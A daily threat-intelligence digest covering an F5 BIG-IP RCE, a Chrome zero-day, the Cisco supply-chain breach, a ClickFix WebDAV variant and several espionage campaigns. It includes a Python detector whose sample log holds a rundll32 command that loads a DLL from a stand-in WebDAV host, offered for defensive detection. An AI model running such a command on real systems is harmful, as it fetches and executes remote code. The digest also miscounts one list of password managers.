F5 BIG-IP RCE escalation 🔥, Chrome zero-day exploitation 🌐, Cisco supply chain breach via TeamPCP 🔗, ClickFix WebDAV evasion 🖱️, TA416 targets European governments 🎯

Daily Threat Intel Digest - April 1, 2026

🔴 Critical Threats & Active Exploitation

[UPDATE] F5 BIG-IP source code breach fuels active exploitation of CVE-2025-53521
Following late-2025 disclosures that state-sponsored actors stole F5’s proprietary BIG-IP source code, CISA has added CVE-2025-53521 to the Known Exploited Vulnerabilities catalog, confirming active exploitation in the wild. Originally classified as a 7.5-severity Denial of Service flaw during the October 2025 patch cycle, new intelligence has forced a critical reassessment: the vulnerability actually enables full unauthenticated Remote Code Execution (RCE), bumping its CVSS score to 9.8. The threat is amplified by the fact that the China-nexus threat group UNC5221 (Brickstorm) possesses stolen source code detailing other unpatched vulnerabilities across the BIG-IP Next platform. Eclypsium researchers note that network edge devices—firewalls, VPNs, and load balancers—saw an 8x increase in exploitation throughout 2025, making continuous firmware-level monitoring essential since traditional EDR agents cannot be installed on these appliances. [Eclypsium analysis]

[NEW] Google confirms active Chrome zero-day (CVE-2026-5281) under targeted exploitation
Google has pushed an emergency security update for Chrome desktop, patching 21 vulnerabilities including CVE-2026-5281, a high-severity use-after-free bug in the Dawn graphics component that is already being exploited in targeted attack campaigns. Successful exploitation allows attackers to achieve remote code execution simply by luring a victim to a compromised or malicious website. Users and enterprise administrators must immediately update to version 146.0.7680.177/.178 (Windows/Mac) or 146.0.7680.177 (Linux) to close the attack window. The remaining 20 high-severity patches address memory safety issues across critical browser components including the V8 JavaScript engine, WebGL, WebCodecs, and WebUSB. [Cyberpress; Canadian Centre for Cyber Security advisory; GBHackers]

[UPDATE] TeamPCP supply chain attack pivots to Cisco, ShinyHunters claims massive source code theft
The TeamPCP supply chain operation that previously backdoored the Trivy vulnerability scanner has cascaded into a major breach of Cisco’s internal development networks. The notorious ShinyHunters extortion group has claimed responsibility for stealing sensitive source code, AWS access keys, and over 300 private GitHub repositories containing code for unreleased tools—including Cisco’s AI Assistant and AI Defense technologies. The breach has downstream implications for major banks, BPO firms, and U.S. government agencies utilizing Cisco infrastructure. Cisco’s internal incident response teams have isolated compromised systems, wiped affected workstations, and enforced a mass employee credential reset. Security teams running Cisco environments should monitor for indicators of the “TeamPCP Cloud Stealer” malware and review cloud access logs for unauthorized activity tied to stolen AWS credentials. [Cyberpress; GBHackers; SANS ISC]

[NEW] ClickFix campaign evolves to bypass PowerShell monitoring via WebDAV and rundll32
Security researchers have identified a stealthy evolution in the widespread ClickFix attack methodology that bypasses traditional security defenses monitoring for malicious scripting activity. Instead of relying on PowerShell or mshta, this new variant tricks victims into executing a command via the Windows Run dialog that uses the native rundll32.exe to connect to an external server via the WebDAV mini-redirector. This technique allows the malware to load a secondary DLL loader (“SkimokKeep”) directly into memory, blending in with standard network traffic. Defenders must look beyond script monitoring to catch this activity, specifically watching for rundll32.exe loading davclnt.dll, establishing outbound connections, or using WebDAV syntax like “@80” in command-line arguments. [CyberProof via Cyberpress]
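The three detection signals named above (rundll32.exe loading davclnt.dll, rundll32.exe making an outbound connection, and a WebDAV `@80`-style UNC path on its command line), as an added example that is not part of the original digest or CyberProof's research: it runs the checks over constructed, simplified Sysmon-style JSON events and correlates hits per process ID. The `@80` pattern is generalized to any `@<port>` or `@SSL` WebDAV mini-redirector UNC form; the event field names and sample values are assumptions for illustration only.

```python
import json
import re
from collections import defaultdict

# WebDAV mini-redirector UNC forms such as \\host@80\share or \\host@SSL\share.
WEBDAV_UNC = re.compile(r"\\\\[^\\\s]+@(?:\d{1,5}|ssl)(?:\\|$)", re.IGNORECASE)

# Constructed sample events (simplified Sysmon-like JSON lines, not real telemetry).
# Event IDs follow Sysmon: 1 = process create, 3 = network connect, 7 = image load.
SAMPLE_LOG = r"""
{"event_id": 1, "pid": 4120, "image": "C:\\Windows\\System32\\rundll32.exe", "command_line": "rundll32 \\\\203.0.113.10@80\\share\\loader.dll,Start"}
{"event_id": 7, "pid": 4120, "image": "C:\\Windows\\System32\\rundll32.exe", "image_loaded": "C:\\Windows\\System32\\davclnt.dll"}
{"event_id": 3, "pid": 4120, "image": "C:\\Windows\\System32\\rundll32.exe", "dest_ip": "203.0.113.10", "dest_port": 80}
{"event_id": 1, "pid": 5000, "image": "C:\\Windows\\System32\\rundll32.exe", "command_line": "rundll32 shell32.dll,Control_RunDLL"}
{"event_id": 1, "pid": 5100, "image": "C:\\Windows\\System32\\notepad.exe", "command_line": "notepad readme.txt"}
"""


def parse_events(text):
    """Parse JSON-lines telemetry into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_rundll32(image):
    """True when the process image file name is rundll32.exe, regardless of path or case."""
    return image.lower().rsplit("\\", 1)[-1] == "rundll32.exe"


def detect_webdav_rundll32(events):
    """Return {pid: [reasons]} for rundll32.exe processes showing the WebDAV ClickFix pattern."""
    findings = defaultdict(list)
    for ev in events:
        if not is_rundll32(ev.get("image", "")):
            continue  # only rundll32.exe is in scope for this detection
        pid, eid = ev["pid"], ev.get("event_id")
        if eid == 1 and WEBDAV_UNC.search(ev.get("command_line", "")):
            findings[pid].append("webdav_unc_in_cmdline")
        elif eid == 7 and ev.get("image_loaded", "").lower().endswith("\\davclnt.dll"):
            findings[pid].append("loads_davclnt")
        elif eid == 3:
            findings[pid].append("outbound_%s:%s" % (ev.get("dest_ip"), ev.get("dest_port")))
    return dict(findings)


if __name__ == "__main__":
    for pid, reasons in detect_webdav_rundll32(parse_events(SAMPLE_LOG)).items():
        print(pid, reasons)
```

A single reason is worth a look; all three on one PID, as with the constructed process 4120, is a strong match for the technique described above.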

🎯 Threat Actor Activity & Campaigns

[UPDATE] Chinese cyberespionage group TA416 shifts focus back to European government and NATO entities
The China-nexus threat group TA416 (also tracked as Mustang Panda) has resumed aggressive targeting of European diplomatic missions and delegations to NATO and the EU following heightened geopolitical tensions over trade, rare earths exports, and the Russia-Ukraine war. Proofpoint researchers note the renewed focus began in mid-2025 immediately following the 25th EU-China summit, utilizing varied phishing lures including fake interview requests and collaboration proposals to deliver customized PlugX backdoors via DLL sideloading. In a separate expansion of its targeting scope, the same group began targeting Middle Eastern government entities in March 2026 to gather regional intelligence on the ongoing Iranian conflict. [CyberScoop]

[NEW] UAC-0255 deploys AGEWHEEZE RAT across Ukrainian public and private sectors
A widespread phishing campaign tracked as UAC-0255 is actively targeting Ukrainian organizations across government, financial, medical, and educational sectors by impersonating CERT-UA. Threat actors are distributing a Go-based remote access trojan called AGEWHEEZE via password-protected archives hosted on the Files.fm service. The malware provides operators with extensive capabilities including screen streaming, keyboard/mouse emulation, clipboard interaction, and process management. CERT-UA traced the command-and-control infrastructure to an OVH-hosted server and confirmed the “CyberSerp” Telegram channel publicly claimed responsibility for the attacks. Despite the broad targeting scope, investigators assessed the campaign as largely unsuccessful. [SOC Prime analysis]

[NEW] Routine access and legitimate IT tools drive modern intrusions
Blackpoint Cyber’s 2026 Annual Threat Report confirms a significant shift in attacker behavior away from novel vulnerability exploitation toward the abuse of legitimate credentials and trusted administrative tools. SSL VPN abuse accounted for 32.8% of all identifiable incidents, while Remote Monitoring and Management (RMM) tool abuse—particularly ScreenConnect—appeared in 30.3% of cases. The majority of overall incident volume (57.5%) was driven by social engineering, specifically fake CAPTCHA and ClickFix-style campaigns that instruct users to paste commands into the Windows Run dialog. In cloud environments, adversaries are successfully bypassing MFA by capturing authenticated session tokens via Adversary-in-the-Middle phishing, accounting for 16% of cloud account compromises. [BleepingComputer]

⚠️ Vulnerabilities & Patches

[NEW] Public PoC exploit released for critical nginx-ui backup restore vulnerability
A publicly available proof-of-concept exploit significantly lowers the barrier for attacking CVE-2026-33026, a critical flaw in the nginx-ui web management interface that allows attackers to achieve arbitrary command execution on the underlying host. The vulnerability stems from a circular trust model in the application’s backup architecture where AES-CBC encryption keys and initialization vectors are exposed to the client, allowing attackers to modify backup configurations, recalculate hashes, and silently inject backdoors during the restore process. Administrators must immediately upgrade to nginx-ui version 2.3.4, which patches the flaw, and audit recent restoration activity for unauthorized configuration changes. [Cyberpress]

[NEW] RWC 2026 research exposes systemic private key leaks and password manager vault failures
Presentations at the Real World Cryptography Symposium have revealed systemic weaknesses in fundamental security infrastructure. GitGuardian presented research mapping 945,560 leaked private keys to 139,767 certificates via Certificate Transparency logs, demonstrating that key material escaping into public repositories is a systemic problem rather than a series of isolated incidents. Separately, security researchers demonstrated 27 distinct attacks against four major cloud-based password managers (Bitwarden, LastPass, and Dashlane) under a malicious server model, including the ability for a compromised Bitwarden server to enforce key recovery and steal plaintext passwords via favicon resolution. [GitGuardian]

📋 Policy & Industry News

[NEW] FBI warns of data security risks from Chinese-developed mobile applications
The U.S. Federal Bureau of Investigation has issued a formal warning advising Americans against using foreign-developed mobile applications, explicitly focusing on those created by Chinese developers due to significant data security and privacy risks. The warning aligns with broader U.S. government efforts to secure sensitive personal and corporate data from foreign intelligence collection programs operating under adversary national security laws. [SecurityWeek; BleepingComputer]

[NEW] Iran designates U.S. tech companies as “legitimate targets” amid ongoing cyber conflict
The Iranian government has issued threats against the Middle East operations of more than a dozen major U.S. technology companies, including Microsoft, Nvidia, and Google, formally labeling them “legitimate targets.” This escalation coincides with expanded operations by pro-Iranian threat groups as regional military conflicts continue, signaling an increased risk of retaliatory cyberattacks against U.S. corporate infrastructure. [Security Boulevard]

[NEW] Microsoft Teams introduces automatic EXIF metadata stripping
Microsoft is rolling out a significant privacy and security update for Teams that automatically strips EXIF metadata—including GPS coordinates, precise timestamps, and device model data—from all images shared within chats and channels. The feature works silently in the background, closing a passive but dangerous OSINT vector frequently exploited by threat actors for targeted social engineering. The update also includes a mandatory browser modernization requiring Teams web users to comply with ECMAScript 2022 (ES2022) standards by May 15, 2026. [Cyberpress; GBHackers]